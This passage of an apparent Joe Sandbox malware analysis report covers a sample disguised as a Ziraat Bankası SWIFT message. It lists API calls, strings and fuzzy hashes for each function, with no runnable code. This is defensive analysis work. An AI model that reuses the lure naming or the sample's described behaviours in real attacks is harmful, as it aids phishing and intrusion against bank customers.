                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                                                                                        • String ID: 0$tooltips_class32
                                                                                                                                                        • API String ID: 3877571568-3619404913
                                                                                                                                                        • Opcode ID: 10dbdbea092169b14c3064ad4ae13f1d8c0170e964250344670b4fddbf315b81
                                                                                                                                                        • Instruction ID: 4bde660d81da9ec8a9cde8714967fafc6cb97b47ec44450fd5ca14aae00047e5
                                                                                                                                                        • Opcode Fuzzy Hash: 10dbdbea092169b14c3064ad4ae13f1d8c0170e964250344670b4fddbf315b81
                                                                                                                                                        • Instruction Fuzzy Hash: 7071CFB4140345AFDB24CF28CC85FAA77E5FB89704F08491EF985972A1D771E982CB12
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F
                                                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 000EF37A
                                                                                                                                                          • Part of subcall function 000ED7DE: ClientToScreen.USER32(?,?), ref: 000ED807
                                                                                                                                                          • Part of subcall function 000ED7DE: GetWindowRect.USER32(?,?), ref: 000ED87D
                                                                                                                                                          • Part of subcall function 000ED7DE: PtInRect.USER32(?,?,000EED5A), ref: 000ED88D
                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 000EF3E3
                                                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 000EF3EE
                                                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 000EF411
                                                                                                                                                        • _wcscat.LIBCMT ref: 000EF441
                                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 000EF458
                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 000EF471
                                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 000EF488
                                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 000EF4AA
                                                                                                                                                        • DragFinish.SHELL32(?), ref: 000EF4B1
                                                                                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 000EF59C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                        • API String ID: 169749273-3440237614
                                                                                                                                                        • Opcode ID: 26f15760a7e214def651099172d58c841f3d59ff828e83095a21e2ecaa509b29
                                                                                                                                                        • Instruction ID: 53e45ec113d9b032da6871bd55604daeae1968d6ce8112b020190a808bd47e2e
                                                                                                                                                        • Opcode Fuzzy Hash: 26f15760a7e214def651099172d58c841f3d59ff828e83095a21e2ecaa509b29
                                                                                                                                                        • Instruction Fuzzy Hash: 51613A71108341AFC711EF64DC85DAFBBF8BF89714F004A1EF595A21A2DB709A49CB52
                                                                                                                                                        APIs
                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 000EE5AB
                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,000EBEAF), ref: 000EE607
                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000EE647
                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000EE68C
                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000EE6C3
                                                                                                                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,000EBEAF), ref: 000EE6CF
                                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000EE6DF
                                                                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,000EBEAF), ref: 000EE6EE
                                                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 000EE70B
                                                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 000EE717
                                                                                                                                                          • Part of subcall function 000A0FA7: __wcsicmp_l.LIBCMT ref: 000A1030
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                                                        • API String ID: 1212759294-1154884017
                                                                                                                                                        • Opcode ID: c4663aa464d596d603b49a21f7259fe986e2c9237ff6435a785bfd17004d8feb
                                                                                                                                                        • Instruction ID: b98794fc6de97ad32ac93e8fc79a27427bfff82b3d8372cb31cc592e4466a7ff
                                                                                                                                                        • Opcode Fuzzy Hash: c4663aa464d596d603b49a21f7259fe986e2c9237ff6435a785bfd17004d8feb
                                                                                                                                                        • Instruction Fuzzy Hash: F3610171500699FEEB20DFA5DC46FFE77A8BB18764F104115F951E60D1EBB0AA80CBA0
                                                                                                                                                        APIs
                                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 000D09DF
                                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 000D09EF
                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000D09FB
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 000D0A59
                                                                                                                                                        • _wcscat.LIBCMT ref: 000D0A71
                                                                                                                                                        • _wcscat.LIBCMT ref: 000D0A83
                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000D0A98
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000D0AAC
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000D0ADE
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000D0AFF
                                                                                                                                                        • _wcscpy.LIBCMT ref: 000D0B0B
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000D0B4A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                                        • String ID: *.*
                                                                                                                                                        • API String ID: 3566783562-438819550
                                                                                                                                                        • Opcode ID: 3d2d46cbefdbd44b041c10c7f21588524b9d3656d414a920fb450289288cb0ae
                                                                                                                                                        • Instruction ID: 3c673becf6fb8e730ee8063712609674b40b0c00742ce6e8c7690b073af8b41b
                                                                                                                                                        • Opcode Fuzzy Hash: 3d2d46cbefdbd44b041c10c7f21588524b9d3656d414a920fb450289288cb0ae
                                                                                                                                                        • Instruction Fuzzy Hash: 19614C725043059FD710EF60C845AAEB3E8FF89314F04891EF999C7252DB31E945CBA2
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
                                                                                                                                                          • Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF
                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 000CD292
                                                                                                                                                        • GetDriveTypeW.KERNEL32 ref: 000CD2DF
                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000CD327
                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000CD35E
                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000CD38C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                        • API String ID: 1148790751-4113822522
                                                                                                                                                        • Opcode ID: 0afecd95c4fb4b2cd4cb3d10e3bbfc0893ad714d7b5fbe2b2d95c47dd97d5485
                                                                                                                                                        • Instruction ID: 9445cd77918b8681059422cffbe6491d663e693edbf78f77fb8e1782cd279bbf
                                                                                                                                                        • Opcode Fuzzy Hash: 0afecd95c4fb4b2cd4cb3d10e3bbfc0893ad714d7b5fbe2b2d95c47dd97d5485
                                                                                                                                                        • Instruction Fuzzy Hash: 0B512971104645AFC700EF20C9819AEB7E4FF98758F04486DF8D6A7292DB31EE06DB52
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,?,00000000,?,?,000F3973,?,0000138C,?,?,?,?,00084D71,?), ref: 000C26F1
                                                                                                                                                        • LoadStringW.USER32(00000000,?,000F3973,?), ref: 000C26FA
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,000F3973,?,0000138C,?,?,?,?,00084D71,?,?), ref: 000C271C
                                                                                                                                                        • LoadStringW.USER32(00000000,?,000F3973,?), ref: 000C271F
                                                                                                                                                        • __swprintf.LIBCMT ref: 000C276F
                                                                                                                                                        • __swprintf.LIBCMT ref: 000C2780
                                                                                                                                                        • _wprintf.LIBCMT ref: 000C2829
                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 000C2840
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                        • API String ID: 618562835-2268648507
                                                                                                                                                        • Opcode ID: e6acc8e01ead2ebc5f4e8d75d691dbecd2edadc747cab1c70a9d5d8b73388a3c
                                                                                                                                                        • Instruction ID: 7526dec6ecf20905fce9f1375ca418da4072a248e3f5ca84e343f733006b698f
                                                                                                                                                        • Opcode Fuzzy Hash: e6acc8e01ead2ebc5f4e8d75d691dbecd2edadc747cab1c70a9d5d8b73388a3c
                                                                                                                                                        • Instruction Fuzzy Hash: 40412772800219AADF14FBE0DE86EEEB778BF15745F100069B541B6093EB746F49CB60
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,000EBEF4,?,?), ref: 000EE754
                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,000EBEF4,?,?,00000000,?), ref: 000EE76B
                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,000EBEF4,?,?,00000000,?), ref: 000EE776
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,000EBEF4,?,?,00000000,?), ref: 000EE783
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 000EE78C
                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,000EBEF4,?,?,00000000,?), ref: 000EE79B
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 000EE7A4
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,000EBEF4,?,?,00000000,?), ref: 000EE7AB
                                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000EBEF4,?,?,00000000,?), ref: 000EE7BC
                                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,0010D9BC,?), ref: 000EE7D5
                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 000EE7E5
                                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 000EE809
                                                                                                                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 000EE834
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 000EE85C
                                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 000EE872
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3840717409-0
                                                                                                                                                        • Opcode ID: 204d9e302a9b2fffda784a65f15e1f0c7306bf5a2e76be529389d488633a9340
                                                                                                                                                        • Instruction ID: e218d44040ed04a4b8056af12b001486a84baae7bef9c91cec848b6b0d8aa952
                                                                                                                                                        • Opcode Fuzzy Hash: 204d9e302a9b2fffda784a65f15e1f0c7306bf5a2e76be529389d488633a9340
                                                                                                                                                        • Instruction Fuzzy Hash: 72414A75600249EFDB119FA5EC48EAE7BB8FF89711F108058F949E7260DB709D80CB20
                                                                                                                                                        APIs
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 000D076F
                                                                                                                                                        • _wcscat.LIBCMT ref: 000D0787
                                                                                                                                                        • _wcscat.LIBCMT ref: 000D0799
                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000D07AE
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000D07C2
                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 000D07DA
                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 000D07F4
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000D0806
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                                        • String ID: *.*
                                                                                                                                                        • API String ID: 34673085-438819550
                                                                                                                                                        • Opcode ID: 58a2f29cff1e057425671b58204d40c9f1949cf52adec9ec9ce09f70c5f4e3b7
                                                                                                                                                        • Instruction ID: 1efa728a12e587a0bb729f2c0f75467abc4b52ebe62955facaca7b649c9f2f38
                                                                                                                                                        • Opcode Fuzzy Hash: 58a2f29cff1e057425671b58204d40c9f1949cf52adec9ec9ce09f70c5f4e3b7
                                                                                                                                                        • Instruction Fuzzy Hash: 8E818F715043019FCB64EF64C845AAEB7E8BF88314F14882FF889D7351EB30D9548BA2
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F
                                                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000EEF3B
                                                                                                                                                        • GetFocus.USER32 ref: 000EEF4B
                                                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 000EEF56
                                                                                                                                                        • _memset.LIBCMT ref: 000EF081
                                                                                                                                                        • GetMenuItemInfoW.USER32 ref: 000EF0AC
                                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 000EF0CC
                                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 000EF0DF
                                                                                                                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 000EF113
                                                                                                                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 000EF15B
                                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000EF193
                                                                                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 000EF1C8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 1296962147-4108050209
                                                                                                                                                        • Opcode ID: 72f802241fea4779e91adb5c0f57fe41c5d90cb20132ddd384dd68859950b96e
                                                                                                                                                        • Instruction ID: 1a67518c71fdaf9279fed8396b8247491913bbf7794e71ce1fd3c762fafe49e5
                                                                                                                                                        • Opcode Fuzzy Hash: 72f802241fea4779e91adb5c0f57fe41c5d90cb20132ddd384dd68859950b96e
                                                                                                                                                        • Instruction Fuzzy Hash: B9818F71608386AFDB20CF16DC84ABBBBE5FB88314F00456EF998A7291D770D941CB52
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000BABD7
                                                                                                                                                          • Part of subcall function 000BABBB: GetLastError.KERNEL32(?,000BA69F,?,?,?), ref: 000BABE1
                                                                                                                                                          • Part of subcall function 000BABBB: GetProcessHeap.KERNEL32(00000008,?,?,000BA69F,?,?,?), ref: 000BABF0
                                                                                                                                                          • Part of subcall function 000BABBB: HeapAlloc.KERNEL32(00000000,?,000BA69F,?,?,?), ref: 000BABF7
                                                                                                                                                          • Part of subcall function 000BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000BAC0E
                                                                                                                                                          • Part of subcall function 000BAC56: GetProcessHeap.KERNEL32(00000008,000BA6B5,00000000,00000000,?,000BA6B5,?), ref: 000BAC62
                                                                                                                                                          • Part of subcall function 000BAC56: HeapAlloc.KERNEL32(00000000,?,000BA6B5,?), ref: 000BAC69
                                                                                                                                                          • Part of subcall function 000BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,000BA6B5,?), ref: 000BAC7A
                                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000BA8CB
                                                                                                                                                        • _memset.LIBCMT ref: 000BA8E0
                                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000BA8FF
                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 000BA910
                                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 000BA94D
                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000BA969
                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 000BA986
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000BA995
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 000BA99C
                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 000BA9BD
                                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 000BA9C4
                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000BA9F5
                                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000BAA1B
                                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 000BAA2F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3996160137-0
                                                                                                                                                        • Opcode ID: fd13d009f408b70d030cfe318a7e04540ea111df18132fdce99ba36fd227fc3a
                                                                                                                                                        • Instruction ID: 5d023ae6088d67c97ebec3e405fd36c83fc342feb6a4aafc5fdaf1c09aed1a9b
                                                                                                                                                        • Opcode Fuzzy Hash: fd13d009f408b70d030cfe318a7e04540ea111df18132fdce99ba36fd227fc3a
                                                                                                                                                        • Instruction Fuzzy Hash: 94519DB1A00209AFDF10CFA0DD85EEEBBB9FF05300F048129F815A7291DB749A46CB61
                                                                                                                                                        APIs
                                                                                                                                                        • GetDC.USER32(00000000), ref: 000D9E36
                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 000D9E42
                                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 000D9E4E
                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 000D9E5B
                                                                                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 000D9EAF
                                                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 000D9EEB
                                                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 000D9F0F
                                                                                                                                                        • SelectObject.GDI32(00000006,?), ref: 000D9F17
                                                                                                                                                        • DeleteObject.GDI32(?), ref: 000D9F20
                                                                                                                                                        • DeleteDC.GDI32(00000006), ref: 000D9F27
                                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 000D9F32
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
